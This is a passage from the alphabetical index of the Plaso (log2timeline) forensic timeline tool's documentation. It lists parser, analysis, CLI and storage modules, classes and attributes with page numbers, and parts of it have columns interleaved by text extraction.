pid (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogEventData attribute), 376
pid (plaso.parsers.santa.SantaExecutionEventData attribute), 419
pid (plaso.parsers.santa.SantaFileSystemEventData attribute), 420
pid (plaso.parsers.selinux.SELinuxLogEventData attribute), 426
pid (plaso.parsers.syslog.SyslogLineEventData attribute), 442
pid (plaso.parsers.systemd_journal.SystemdJournalEventData attribute), 444
PID (plaso.parsers.text_parser.PyparsingConstants attribute), 446
pid (plaso.parsers.utmp.UtmpEventData attribute), 452
pid (plaso.parsers.utmpx.UtmpxMacOSEventData attribute), 453
pin_status (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventData attribute), 229
PinfoTool (class in plaso.cli.pinfo_tool), 85
places_title (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkEventData attribute), 265
plaso (module), 505
plaso.analysis (module), 54

plaso.analysis.browser_search (module), 39
plaso.analysis.chrome_extension (module), 40
plaso.analysis.definitions (module), 40
plaso.analysis.hash_tagging (module), 40
plaso.analysis.interface (module), 43
plaso.analysis.logger (module), 44
plaso.analysis.manager (module), 44
plaso.analysis.mediator (module), 45
plaso.analysis.nsrlsvr (module), 46
plaso.analysis.sessionize (module), 48
plaso.analysis.tagging (module), 48
plaso.analysis.test_memory (module), 49
plaso.analysis.unique_domains_visited (module), 49
plaso.analysis.viper (module), 50
plaso.analysis.virustotal (module), 51
plaso.analysis.windows_services (module), 52
plaso.analyzers (module), 62
plaso.analyzers.hashers (module), 59
plaso.analyzers.hashers.entropy (module), 55
plaso.analyzers.hashers.interface (module), 55
plaso.analyzers.hashers.manager (module), 56
plaso.analyzers.hashers.md5 (module), 57
plaso.analyzers.hashers.sha1 (module), 58
plaso.analyzers.hashers.sha256 (module), 58
plaso.analyzers.hashing_analyzer (module), 59
plaso.analyzers.interface (module), 59
plaso.analyzers.logger (module), 60
plaso.analyzers.manager (module), 60
plaso.analyzers.yara_analyzer (module), 61
plaso.cli (module), 97
plaso.cli.analysis_tool (module), 82
plaso.cli.extraction_tool (module), 82
plaso.cli.helpers (module), 82
plaso.cli.helpers.analysis_plugins (module), 62
plaso.cli.helpers.artifact_definitions (module), 63
plaso.cli.helpers.artifact_filters (module), 63
plaso.cli.helpers.data_location (module), 64
plaso.cli.helpers.date_filters (module), 64
plaso.cli.helpers.dynamic_output (module), 65
plaso.cli.helpers.elastic_output (module), 66
plaso.cli.helpers.elastic_ts_output (module), 66
plaso.cli.helpers.event_filters (module), 67
plaso.cli.helpers.extraction (module), 67
plaso.cli.helpers.filter_file (module), 68
plaso.cli.helpers.hashers (module), 69
plaso.cli.helpers.interface (module), 69
plaso.cli.helpers.language (module), 70
plaso.cli.helpers.manager (module), 70
plaso.cli.helpers.nsrlsvr_analysis (module), 71
plaso.cli.helpers.output_modules (module), 72
plaso.cli.helpers.parsers (module), 73
plaso.cli.helpers.process_resources (module), 73
plaso.cli.helpers.profiling (module), 74
plaso.cli.helpers.sessionize_analysis (module), 74

582 Index Plaso (log2timeline), Release 20210606 plaso.cli.helpers.status_view plaso.containers.event_sources module, 75 module, 104 plaso.cli.helpers.storage_format plaso.containers.events module, 76 module, 104 plaso.cli.helpers.tagging_analysis plaso.containers.interface module, 76 module, 108 plaso.cli.helpers.temporary_directory plaso.containers.manager module, 77 module, 109 plaso.cli.helpers.text_prepend plaso.containers.plist_event module, 77 module, 110 plaso.cli.helpers.vfs_backend plaso.containers.reports module, 78 module, 111 plaso.cli.helpers.viper_analysis plaso.containers.sessions module, 78 module, 111 plaso.cli.helpers.virustotal_analysis plaso.containers.shell_item_events module, 79 module, 116 plaso.cli.helpers.windows_services_analysis plaso.containers.storage_media module, 80 module, 117 plaso.cli.helpers.workers plaso.containers.tasks module, 80 module, 117 plaso.cli.helpers.xlsx_output plaso.containers.time_events module, 81 module, 119 plaso.cli.helpers.yara_rules plaso.containers.warnings module, 81 module, 120 plaso.cli.image_export_tool plaso.containers.windows_events module, 83 module, 121 plaso.cli.log2timeline_tool plaso.dependencies module, 84 module, 505 plaso.cli.logger plaso.engine module, 85 module, 154 plaso.cli.pinfo_tool plaso.engine.artifact_filters module, 85 module, 122 plaso.cli.psort_tool plaso.engine.configurations module, 87 module, 123 plaso.cli.psteal_tool plaso.engine.engine module, 88 module, 127 plaso.cli.status_view plaso.engine.extractors module, 89 module, 129 plaso.cli.storage_media_tool plaso.engine.filter_file module, 90 module, 130 plaso.cli.time_slices plaso.engine.filters_helper module, 91 module, 130 plaso.cli.tool_options plaso.engine.knowledge_base module, 92 module, 131 plaso.cli.tools plaso.engine.logger module, 93 module, 135 plaso.cli.views plaso.engine.path_filters module, 95 module, 135 plaso.containers plaso.engine.path_helper module, 122 module, 136 plaso.containers.analyzer_result 
plaso.engine.plaso_queue module, 97 module, 137 plaso.containers.artifacts plaso.engine.process_info module, 98 module, 138

Index 583 Plaso (log2timeline), Release 20210606 plaso.engine.processing_status plaso.formatters.winevt_rc module, 138 module, 175 plaso.engine.profilers plaso.formatters.winlnk module, 145 module, 176 plaso.engine.tagging_file plaso.formatters.winprefetch module, 147 module, 177 plaso.engine.worker plaso.formatters.winreg module, 147 module, 177 plaso.engine.yaml_filter_file plaso.formatters.yaml_formatters_file module, 148 module, 177 plaso.engine.zeromq_queue plaso.lib module, 149 module, 186 plaso.filters plaso.lib.bufferlib module, 167 module, 178 plaso.filters.event_filter plaso.lib.decorators module, 154 module, 179 plaso.filters.expression_parser plaso.lib.definitions module, 155 module, 179 plaso.filters.expressions plaso.lib.dtfabric_helper module, 156 module, 179 plaso.filters.file_entry plaso.lib.errors module, 157 module, 180 plaso.filters.filters plaso.lib.line_reader_file module, 160 module, 182 plaso.filters.logger plaso.lib.loggers module, 163 module, 183 plaso.filters.parser_filter plaso.lib.plist module, 163 module, 184 plaso.filters.path_filter plaso.lib.specification module, 165 module, 184 plaso.filters.value_types plaso.multi_process module, 166 module, 195 plaso.formatters plaso.multi_process.analysis_engine module, 178 module, 186 plaso.formatters.chrome plaso.multi_process.analysis_process module, 167 module, 187 plaso.formatters.chrome_preferences plaso.multi_process.base_process module, 167 module, 187 plaso.formatters.default plaso.multi_process.engine module, 168 module, 187 plaso.formatters.file_system plaso.multi_process.extraction_engine module, 168 module, 188 plaso.formatters.firefox plaso.multi_process.extraction_process module, 169 module, 188 plaso.formatters.interface plaso.multi_process.logger module, 169 module, 189 plaso.formatters.logger plaso.multi_process.output_engine module, 173 module, 189 plaso.formatters.manager plaso.multi_process.plaso_xmlrpc module, 173 module, 190 plaso.formatters.msiecf plaso.multi_process.rpc 
module, 174 module, 191 plaso.formatters.shell_items plaso.multi_process.task_engine module, 174 module, 192

584 Index Plaso (log2timeline), Release 20210606 plaso.multi_process.task_manager plaso.parsers.bash_history module, 192 module, 358 plaso.multi_process.task_process plaso.parsers.bencode_parser module, 194 module, 359 plaso.output plaso.parsers.bencode_plugins module, 211 module, 213 plaso.output.dynamic plaso.parsers.bencode_plugins.interface module, 195 module, 211 plaso.output.elastic plaso.parsers.bencode_plugins.transmission module, 195 module, 212 plaso.output.elastic_ts plaso.parsers.bencode_plugins.utorrent module, 195 module, 212 plaso.output.formatting_helper plaso.parsers.bsm module, 196 module, 360 plaso.output.interface plaso.parsers.chrome_cache module, 197 module, 361 plaso.output.json_line plaso.parsers.chrome_preferences module, 199 module, 363 plaso.output.json_out plaso.parsers.cookie_plugins module, 199 module, 216 plaso.output.kml plaso.parsers.cookie_plugins.ganalytics module, 200 module, 213 plaso.output.l2t_csv plaso.parsers.cookie_plugins.interface module, 200 module, 215 plaso.output.logger plaso.parsers.cookie_plugins.manager module, 201 module, 216 plaso.output.manager plaso.parsers.cups_ipp module, 201 module, 365 plaso.output.mediator plaso.parsers.custom_destinations module, 203 module, 366 plaso.output.null plaso.parsers.czip module, 205 module, 367 plaso.output.rawpy plaso.parsers.czip_plugins module, 206 module, 219 plaso.output.shared_dsv plaso.parsers.czip_plugins.interface module, 206 module, 216 plaso.output.shared_elastic plaso.parsers.czip_plugins.oxml module, 207 module, 217 plaso.output.shared_json plaso.parsers.docker module, 209 module, 367 plaso.output.tln plaso.parsers.dpkg module, 209 module, 369 plaso.output.xlsx plaso.parsers.dsv_parser module, 210 module, 370 plaso.parsers plaso.parsers.esedb module, 469 module, 371 plaso.parsers.android_app_usage plaso.parsers.esedb_plugins module, 352 module, 228 plaso.parsers.apache_access plaso.parsers.esedb_plugins.file_history module, 353 module, 219 plaso.parsers.apt_history 
plaso.parsers.esedb_plugins.interface module, 355 module, 220 plaso.parsers.asl plaso.parsers.esedb_plugins.msie_webcache module, 356 module, 221

Index 585 Plaso (log2timeline), Release 20210606 plaso.parsers.esedb_plugins.srum plaso.parsers.opera module, 224 module, 407 plaso.parsers.filestat plaso.parsers.pe module, 372 module, 409 plaso.parsers.firefox_cache plaso.parsers.plist module, 373 module, 410 plaso.parsers.fseventsd plaso.parsers.plist_plugins module, 375 module, 239 plaso.parsers.gdrive_synclog plaso.parsers.plist_plugins.airport module, 376 module, 232 plaso.parsers.google_logging plaso.parsers.plist_plugins.appleaccount module, 377 module, 232 plaso.parsers.iis plaso.parsers.plist_plugins.bluetooth module, 378 module, 233 plaso.parsers.interface plaso.parsers.plist_plugins.default module, 381 module, 233 plaso.parsers.java_idx plaso.parsers.plist_plugins.install_history module, 384 module, 233 plaso.parsers.logger plaso.parsers.plist_plugins.interface module, 385 module, 234 plaso.parsers.mac_appfirewall plaso.parsers.plist_plugins.ipod module, 385 module, 235 plaso.parsers.mac_keychain plaso.parsers.plist_plugins.launchd module, 386 module, 235 plaso.parsers.mac_securityd plaso.parsers.plist_plugins.macuser module, 389 module, 236 plaso.parsers.mac_wifi plaso.parsers.plist_plugins.safari module, 390 module, 236 plaso.parsers.mactime plaso.parsers.plist_plugins.softwareupdate module, 392 module, 237 plaso.parsers.manager plaso.parsers.plist_plugins.spotlight module, 393 module, 238 plaso.parsers.mcafeeav plaso.parsers.plist_plugins.spotlight_volume module, 395 module, 238 plaso.parsers.mediator plaso.parsers.plist_plugins.timemachine module, 397 module, 238 plaso.parsers.msiecf plaso.parsers.pls_recall module, 401 module, 410 plaso.parsers.networkminer plaso.parsers.plugins module, 403 module, 411 plaso.parsers.ntfs plaso.parsers.popcontest module, 404 module, 412 plaso.parsers.olecf plaso.parsers.presets module, 407 module, 415 plaso.parsers.olecf_plugins plaso.parsers.recycler module, 232 module, 416 plaso.parsers.olecf_plugins.automatic_destinationsplaso.parsers.safari_cookies module, 228 
module, 418 plaso.parsers.olecf_plugins.default plaso.parsers.santa module, 230 module, 419 plaso.parsers.olecf_plugins.interface plaso.parsers.sccm module, 230 module, 424 plaso.parsers.olecf_plugins.summary plaso.parsers.selinux module, 231 module, 426

586 Index Plaso (log2timeline), Release 20210606 plaso.parsers.setupapi plaso.parsers.sqlite_plugins.mac_document_versions module, 427 module, 282 plaso.parsers.shared plaso.parsers.sqlite_plugins.mac_knowledgec module, 240 module, 284 plaso.parsers.shared.shell_items plaso.parsers.sqlite_plugins.mac_notes module, 239 module, 286 plaso.parsers.skydrivelog plaso.parsers.sqlite_plugins.mac_notificationcenter module, 428 module, 288 plaso.parsers.sophos_av plaso.parsers.sqlite_plugins.mackeeper_cache module, 431 module, 289 plaso.parsers.spotlight_storedb plaso.parsers.sqlite_plugins.macos_tcc module, 432 module, 291 plaso.parsers.sqlite plaso.parsers.sqlite_plugins.safari module, 434 module, 292 plaso.parsers.sqlite_plugins plaso.parsers.sqlite_plugins.skype module, 316 module, 294 plaso.parsers.sqlite_plugins.android_calls plaso.parsers.sqlite_plugins.tango_android module, 240 module, 300 plaso.parsers.sqlite_plugins.android_sms plaso.parsers.sqlite_plugins.twitter_android module, 243 module, 303 plaso.parsers.sqlite_plugins.android_webview plaso.parsers.sqlite_plugins.twitter_ios module, 245 module, 308 plaso.parsers.sqlite_plugins.android_webviewcacheplaso.parsers.sqlite_plugins.windows_timeline module, 246 module, 311 plaso.parsers.sqlite_plugins.appusage plaso.parsers.sqlite_plugins.zeitgeist module, 247 module, 314 plaso.parsers.sqlite_plugins.chrome_autofill plaso.parsers.symantec module, 248 module, 436 plaso.parsers.sqlite_plugins.chrome_cookies plaso.parsers.syslog module, 249 module, 441 plaso.parsers.sqlite_plugins.chrome_extension_activityplaso.parsers.syslog_plugins module, 251 module, 318 plaso.parsers.sqlite_plugins.chrome_history plaso.parsers.syslog_plugins.cron module, 253 module, 316 plaso.parsers.sqlite_plugins.firefox_cookies plaso.parsers.syslog_plugins.interface module, 259 module, 316 plaso.parsers.sqlite_plugins.firefox_downloadsplaso.parsers.syslog_plugins.ssh module, 260 module, 317 plaso.parsers.sqlite_plugins.firefox_history 
plaso.parsers.systemd_journal module, 262 module, 444 plaso.parsers.sqlite_plugins.gdrive plaso.parsers.text_parser module, 267 module, 445 plaso.parsers.sqlite_plugins.hangouts_messagesplaso.parsers.trendmicroav module, 270 module, 448 plaso.parsers.sqlite_plugins.imessage plaso.parsers.utmp module, 273 module, 451 plaso.parsers.sqlite_plugins.interface plaso.parsers.utmpx module, 275 module, 453 plaso.parsers.sqlite_plugins.kik_ios plaso.parsers.vsftpd module, 276 module, 454 plaso.parsers.sqlite_plugins.kodi plaso.parsers.winevt module, 278 module, 455 plaso.parsers.sqlite_plugins.ls_quarantine plaso.parsers.winevtx module, 281 module, 456

Index 587 Plaso (log2timeline), Release 20210606 plaso.parsers.winfirewall plaso.parsers.winreg_plugins.task_scheduler module, 458 module, 342 plaso.parsers.winjob plaso.parsers.winreg_plugins.terminal_server module, 460 module, 343 plaso.parsers.winlnk plaso.parsers.winreg_plugins.timezone module, 461 module, 344 plaso.parsers.winprefetch plaso.parsers.winreg_plugins.typedurls module, 463 module, 345 plaso.parsers.winreg_parser plaso.parsers.winreg_plugins.usb module, 464 module, 346 plaso.parsers.winreg_plugins plaso.parsers.winreg_plugins.usbstor module, 352 module, 347 plaso.parsers.winreg_plugins.amcache plaso.parsers.winreg_plugins.userassist module, 318 module, 348 plaso.parsers.winreg_plugins.appcompatcache plaso.parsers.winreg_plugins.windows_version module, 321 module, 349 plaso.parsers.winreg_plugins.bagmru plaso.parsers.winreg_plugins.winlogon module, 322 module, 350 plaso.parsers.winreg_plugins.bam plaso.parsers.winreg_plugins.winrar module, 323 module, 351 plaso.parsers.winreg_plugins.ccleaner plaso.parsers.winrestore module, 323 module, 464 plaso.parsers.winreg_plugins.default plaso.parsers.xchatlog module, 325 module, 465 plaso.parsers.winreg_plugins.interface plaso.parsers.xchatscrollback module, 325 module, 467 plaso.parsers.winreg_plugins.lfu plaso.parsers.zsh_extended_history module, 327 module, 468 plaso.parsers.winreg_plugins.mountpoints plaso.preprocessors module, 328 module, 478 plaso.parsers.winreg_plugins.mrulist plaso.preprocessors.interface module, 329 module, 469 plaso.parsers.winreg_plugins.mrulistex plaso.preprocessors.linux module, 331 module, 471 plaso.parsers.winreg_plugins.msie_zones plaso.preprocessors.logger module, 333 module, 472 plaso.parsers.winreg_plugins.network_drives plaso.preprocessors.macos module, 334 module, 472 plaso.parsers.winreg_plugins.networks plaso.preprocessors.manager module, 335 module, 473 plaso.parsers.winreg_plugins.officemru plaso.preprocessors.mediator module, 336 module, 474 
plaso.parsers.winreg_plugins.outlook plaso.preprocessors.windows module, 337 module, 475 plaso.parsers.winreg_plugins.programscache plaso.serializer module, 337 module, 479 plaso.parsers.winreg_plugins.run plaso.serializer.interface module, 338 module, 478 plaso.parsers.winreg_plugins.sam_users plaso.serializer.json_serializer module, 339 module, 478 plaso.parsers.winreg_plugins.services plaso.serializer.logger module, 340 module, 479 plaso.parsers.winreg_plugins.shutdown plaso.single_process module, 341 module, 480

588 Index Plaso (log2timeline), Release 20210606 plaso.single_process.extraction_engine plaso.winnt.shell_folder_ids module, 479 module, 505 plaso.storage plaso.winnt.time_zones module, 504 module, 505 plaso.storage.event_tag_index play_count (plaso.parsers.sqlite_plugins.kodi.KodiVideoEventData module, 492 attribute), 281 plaso.storage.factory PLIST_KEY (plaso.parsers.plist_plugins.interface.PlistPlugin module, 493 attribute), 234 plaso.storage.fake PLIST_KEYS (plaso.parsers.plist_plugins.airport.AirportPlugin module, 483 attribute), 232 plaso.storage.fake.event_heap PLIST_KEYS (plaso.parsers.plist_plugins.appleaccount.AppleAccountPlugin module, 480 attribute), 232 plaso.storage.fake.fake_store PLIST_KEYS (plaso.parsers.plist_plugins.bluetooth.BluetoothPlugin module, 480 attribute), 233 plaso.storage.fake.writer PLIST_KEYS (plaso.parsers.plist_plugins.install_history.InstallHistoryPlugin module, 482 attribute), 233 plaso.storage.identifiers PLIST_KEYS (plaso.parsers.plist_plugins.interface.PlistPlugin module, 494 attribute), 234 plaso.storage.interface PLIST_KEYS (plaso.parsers.plist_plugins.ipod.IPodPlugin module, 495 attribute), 235 plaso.storage.logger PLIST_KEYS (plaso.parsers.plist_plugins.launchd.LaunchdPlugin module, 498 attribute), 236 plaso.storage.merge_reader PLIST_KEYS (plaso.parsers.plist_plugins.macuser.MacUserPlugin module, 498 attribute), 236 plaso.storage.reader PLIST_KEYS (plaso.parsers.plist_plugins.safari.SafariHistoryPlugin module, 499 attribute), 237 plaso.storage.redis PLIST_KEYS (plaso.parsers.plist_plugins.softwareupdate.SoftwareUpdatePlugin module, 488 attribute), 237 plaso.storage.redis.reader PLIST_KEYS (plaso.parsers.plist_plugins.spotlight.SpotlightPlugin module, 483 attribute), 238 plaso.storage.redis.redis_store PLIST_KEYS (plaso.parsers.plist_plugins.spotlight_volume.SpotlightVolumePlugin module, 484 attribute), 238 plaso.storage.redis.writer PLIST_KEYS (plaso.parsers.plist_plugins.timemachine.TimeMachinePlugin module, 487 
attribute), 239 plaso.storage.sqlite PLIST_PATH_FILTERS (plaso.parsers.plist_plugins.airport.AirportPlugin module, 492 attribute), 232 plaso.storage.sqlite.reader PLIST_PATH_FILTERS (plaso.parsers.plist_plugins.appleaccount.AppleAccountPlugin module, 488 attribute), 233 plaso.storage.sqlite.sqlite_file PLIST_PATH_FILTERS (plaso.parsers.plist_plugins.bluetooth.BluetoothPlugin module, 489 attribute), 233 plaso.storage.sqlite.writer PLIST_PATH_FILTERS (plaso.parsers.plist_plugins.install_history.InstallHistoryPlugin module, 491 attribute), 233 plaso.storage.time_range PLIST_PATH_FILTERS (plaso.parsers.plist_plugins.interface.PlistPlugin module, 500 attribute), 234 plaso.storage.writer PLIST_PATH_FILTERS (plaso.parsers.plist_plugins.ipod.IPodPlugin module, 501 attribute), 235 plaso.unix PLIST_PATH_FILTERS (plaso.parsers.plist_plugins.safari.SafariHistoryPlugin module, 504 attribute), 237 plaso.winnt PLIST_PATH_FILTERS (plaso.parsers.plist_plugins.softwareupdate.SoftwareUpdatePlugin module, 505 attribute), 237 plaso.winnt.known_folder_ids PLIST_PATH_FILTERS (plaso.parsers.plist_plugins.spotlight.SpotlightPlugin module, 504 attribute), 238 plaso.winnt.language_ids PLIST_PATH_FILTERS (plaso.parsers.plist_plugins.spotlight_volume.SpotlightVolumePlugin module, 505 attribute), 238

Index 589 Plaso (log2timeline), Release 20210606

PLIST_PATH_FILTERS (plaso.parsers.plist_plugins.timemachine.TimeMachinePluginplaso.parsers.popcontest), 414 attribute), 239 PopularityContestSessionEventData (class in PlistFile (class in plaso.lib.plist), 184 plaso.parsers.popcontest), 415 PlistFileArtifactPreprocessorPlugin (class in port (plaso.engine.zeromq_queue.ZeroMQQueue at- plaso.preprocessors.macos), 472 tribute), 152 PlistParser (class in plaso.parsers.plist), 410 PORT (plaso.parsers.iis.WinIISParser attribute), 381 PlistPathFilter (class in port (plaso.parsers.syslog_plugins.ssh.SSHEventData plaso.parsers.plist_plugins.interface), 234 attribute), 317 PlistPlugin (class in port_number (plaso.parsers.apache_access.ApacheAccessEventData plaso.parsers.plist_plugins.interface), 234 attribute), 353 PlistTimeEventData (class in ppid (plaso.parsers.santa.SantaExecutionEventData at- plaso.containers.plist_event), 110 tribute), 419 PlsRecallEventData (class in ppid (plaso.parsers.santa.SantaFileSystemEventData at- plaso.parsers.pls_recall), 410 tribute), 420 PlsRecallParser (class in plaso.parsers.pls_recall), preferred_encoding (plaso.cli.tools.CLITool at- 411 tribute), 93 plugin_name (plaso.analysis.interface.AnalysisPlugin preferred_encoding (plaso.containers.sessions.Session property), 43 attribute), 112 plugin_name (plaso.containers.reports.AnalysisReport preferred_encoding (plaso.containers.sessions.SessionConfiguration attribute), 111 attribute), 115 plugin_name (plaso.containers.warnings.AnalysisWarningpreferred_time_zone attribute), 120 (plaso.containers.sessions.Session attribute), plugin_name (plaso.containers.warnings.PreprocessingWarning 112 attribute), 121 preferred_time_zone policy_identifier (plaso.parsers.trendmicroav.TrendMicroUrlEventData(plaso.containers.sessions.SessionConfiguration attribute), 451 attribute), 115 PopEvent() (plaso.multi_process.output_engine.PsortEventHeappreferred_year (plaso.containers.sessions.Session at- method), 189 tribute), 112 PopEvent() 
(plaso.storage.fake.event_heap.EventHeap preferred_year (plaso.containers.sessions.SessionConfiguration method), 480 attribute), 115 PopEvents() (plaso.multi_process.output_engine.PsortEventHeappreferred_year (plaso.engine.configurations.ProcessingConfiguration method), 189 attribute), 125 PopEvents() (plaso.storage.fake.event_heap.EventHeap prefetch_hash (plaso.parsers.winprefetch.WinPrefetchExecutionEventData method), 480 attribute), 463 PopFromParserChain() PrefixPlistPathFilter (class in (plaso.parsers.mediator.ParserMediator plaso.parsers.plist_plugins.interface), 235 method), 398 PreProcessFail, 180 PopItem() (plaso.engine.plaso_queue.Queue method), PreprocessingWarning (class in 138 plaso.containers.warnings), 120 PopItem() (plaso.engine.zeromq_queue.ZeroMQBufferedReplyQueuePreprocessMediator (class in method), 150 plaso.preprocessors.mediator), 474 PopItem() (plaso.engine.zeromq_queue.ZeroMQPullQueuePreprocessPluginsManager (class in method), 150 plaso.preprocessors.manager), 473 PopItem() (plaso.engine.zeromq_queue.ZeroMQPushQueuePreprocessSources() method), 151 (plaso.engine.engine.BaseEngine method), PopItem() (plaso.engine.zeromq_queue.ZeroMQQueue 128 method), 153 presented (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventData PopItem() (plaso.engine.zeromq_queue.ZeroMQRequestQueue attribute), 288 method), 153 primary_url (plaso.parsers.chrome_preferences.ChromeContentSettingsExceptionsEventData popularity_index (plaso.parsers.opera.OperaGlobalHistoryEventDataattribute), 363 attribute), 407 Print() (plaso.filters.file_entry.DateTimeFileEntryFilter PopularityContestEventData (class in method), 158 plaso.parsers.popcontest), 413 Print() (plaso.filters.file_entry.ExtensionsFileEntryFilter PopularityContestParser (class in method), 158

590 Index Plaso (log2timeline), Release 20210606

Print() (plaso.filters.file_entry.FileEntryFilter method), method), 276 158 Process() (plaso.parsers.syslog_plugins.interface.SyslogPlugin Print() (plaso.filters.file_entry.FileEntryFilterCollection method), 316 method), 159 Process() (plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Print() (plaso.filters.file_entry.NamesFileEntryFilter method), 326 method), 159 process_archives (plaso.engine.configurations.ExtractionConfiguration Print() (plaso.filters.file_entry.SignaturesFileEntryFilter attribute), 124 method), 160 process_arguments (plaso.parsers.santa.SantaExecutionEventData printer_id (plaso.parsers.cups_ipp.CupsIppEventData attribute), 420 attribute), 365 process_compressed_streams PrintExtractionStatusHeader() (plaso.engine.configurations.ExtractionConfiguration (plaso.cli.status_view.StatusView method), attribute), 124 89 process_hash (plaso.parsers.santa.SantaExecutionEventData PrintExtractionSummary() attribute), 419 (plaso.cli.status_view.StatusView method), process_name (plaso.parsers.mac_appfirewall.MacAppFirewallLogEventData 89 attribute), 385 PrintFilterCollection() process_path (plaso.parsers.santa.SantaExecutionEventData (plaso.cli.image_export_tool.ImageExportTool attribute), 420 method), 84 process_path (plaso.parsers.santa.SantaFileSystemEventData PrintSeparatorLine() (plaso.cli.tools.CLITool attribute), 420 method), 94 ProcessInfo (class in plaso.engine.process_info), 138 PrintStorageInformation() processing_status (plaso.engine.worker.EventExtractionWorker (plaso.cli.pinfo_tool.PinfoTool method), 86 attribute), 148 priority (plaso.parsers.google_logging.GoogleLogEventDataPROCESSING_STATUS_HINT attribute), 377 (plaso.analyzers.hashing_analyzer.HashingAnalyzer process (plaso.parsers.santa.SantaFileSystemEventData attribute), 59 attribute), 420 PROCESSING_STATUS_HINT Process() (plaso.parsers.bencode_plugins.interface.BencodePlugin (plaso.analyzers.interface.BaseAnalyzer method), 211 attribute), 60 Process() 
(plaso.parsers.bencode_plugins.transmission.TransmissionBencodePluginPROCESSING_STATUS_HINT method), 212 (plaso.analyzers.yara_analyzer.YaraAnalyzer Process() (plaso.parsers.bencode_plugins.utorrent.UTorrentBencodePluginattribute), 61 method), 212 ProcessingConfiguration (class in Process() (plaso.parsers.cookie_plugins.interface.BaseCookiePluginplaso.engine.configurations), 124 method), 215 ProcessingProfiler (class in plaso.engine.profilers), Process() (plaso.parsers.czip_plugins.interface.CompoundZIPPlugin146 method), 217 ProcessingStatus (class in Process() (plaso.parsers.esedb_plugins.interface.ESEDBPlugin plaso.engine.processing_status), 142 method), 221 ProcessPathSpec() (plaso.engine.worker.EventExtractionWorker Process() (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsOLECFPluginmethod), 148 method), 229 ProcessResourcesArgumentsHelper (class in Process() (plaso.parsers.olecf_plugins.default.DefaultOLECFPluginplaso.cli.helpers.process_resources), 73 method), 230 ProcessSources() (plaso.cli.image_export_tool.ImageExportTool Process() (plaso.parsers.olecf_plugins.interface.OLECFPlugin method), 84 method), 230 ProcessSources() (plaso.multi_process.extraction_engine.ExtractionMultiProcessEngine Process() (plaso.parsers.olecf_plugins.summary.DocumentSummaryInformationOLECFPluginmethod), 188 method), 231 ProcessSources() (plaso.single_process.extraction_engine.SingleProcessEngine Process() (plaso.parsers.olecf_plugins.summary.SummaryInformationOLECFPluginmethod), 479 method), 231 ProcessStatus (class in Process() (plaso.parsers.plist_plugins.interface.PlistPlugin plaso.engine.processing_status), 139 method), 234 ProcessStorage() (plaso.cli.psort_tool.PsortTool Process() (plaso.parsers.plugins.BasePlugin method), method), 87 411 ProduceAnalysisReport() Process() (plaso.parsers.sqlite_plugins.interface.SQLitePlugin (plaso.analysis.mediator.AnalysisMediator

Index 591 Plaso (log2timeline), Release 20210606

method), 45 plaso.cli.helpers.profiling), 74 ProduceAnalysisWarning() ProfilingConfiguration (class in (plaso.analysis.mediator.AnalysisMediator plaso.engine.configurations), 125 method), 45 ProfilingOptions (class in plaso.cli.tool_options), 92 ProduceEventDataStream() program_identifier (plaso.parsers.winreg_plugins.amcache.AMCacheFileEventData (plaso.parsers.mediator.ParserMediator attribute), 319 method), 398 prompt_count (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntry ProduceEventSource() attribute), 291 (plaso.parsers.mediator.ParserMediator PromptUserForVSSCurrentVolume() method), 399 (plaso.cli.storage_media_tool.StorageMediaToolMediator ProduceEventTag() (plaso.analysis.mediator.AnalysisMediator method), 91 method), 46 property_type (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataAttribute ProduceEventWithEventData() attribute), 432 (plaso.parsers.mediator.ParserMediator protocol (plaso.parsers.mac_keychain.KeychainInternetRecordEventData method), 399 attribute), 388 ProduceExtractionWarning() protocol (plaso.parsers.syslog_plugins.ssh.SSHEventData (plaso.parsers.mediator.ParserMediator attribute), 317 method), 399 protocol (plaso.parsers.winfirewall.WinFirewallEventData ProducePreprocessingWarning() attribute), 458 (plaso.preprocessors.mediator.PreprocessMediatorprotocol_version (plaso.parsers.iis.IISEventData at- method), 475 tribute), 379 ProduceRecoveryWarning() PsortEventHeap (class in (plaso.parsers.mediator.ParserMediator plaso.multi_process.output_engine), 189 method), 399 PsortTool (class in plaso.cli.psort_tool), 87 product (plaso.containers.artifacts.OperatingSystemArtifactPstealTool (class in plaso.cli.psteal_tool), 88 attribute), 99 publisher (plaso.parsers.winreg_plugins.amcache.AMCacheProgramEventData product (plaso.parsers.winreg_plugins.usb.WindowsUSBDeviceEventDataattribute), 320 attribute), 346 PushEvent() (plaso.multi_process.output_engine.PsortEventHeap product (plaso.parsers.winreg_plugins.usbstor.USBStorEventData 
method), 190 attribute), 347 PushEvent() (plaso.storage.fake.event_heap.EventHeap product_code (plaso.parsers.winreg_plugins.amcache.AMCacheProgramEventDatamethod), 480 attribute), 320 PushItem() (plaso.engine.plaso_queue.Queue method), product_name (plaso.containers.sessions.Session 138 attribute), 113 PushItem() (plaso.engine.zeromq_queue.ZeroMQBufferedReplyQueue product_name (plaso.containers.sessions.SessionStart method), 150 attribute), 116 PushItem() (plaso.engine.zeromq_queue.ZeroMQPullQueue product_name (plaso.parsers.winreg_plugins.amcache.AMCacheFileEventDatamethod), 151 attribute), 319 PushItem() (plaso.engine.zeromq_queue.ZeroMQPushQueue product_name (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventDatamethod), 151 attribute), 350 PushItem() (plaso.engine.zeromq_queue.ZeroMQQueue product_version (plaso.containers.sessions.Session method), 153 attribute), 113 PushItem() (plaso.engine.zeromq_queue.ZeroMQRequestQueue product_version (plaso.containers.sessions.SessionStart method), 154 attribute), 116 PyParseIntCast() (in module profile_url (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventDataplaso.parsers.text_parser), 445 attribute), 308 PyparsingConstants (class in profilers (plaso.engine.configurations.ProfilingConfiguration plaso.parsers.text_parser), 446 attribute), 125 PyparsingMultiLineTextParser (class in PROFILERS_INFORMATION plaso.parsers.text_parser), 446 (plaso.cli.helpers.profiling.ProfilingArgumentsHelperPyparsingSingleLineTextParser (class in attribute), 74 plaso.parsers.text_parser), 447 profiling (plaso.engine.configurations.ProcessingConfiguration attribute), 125 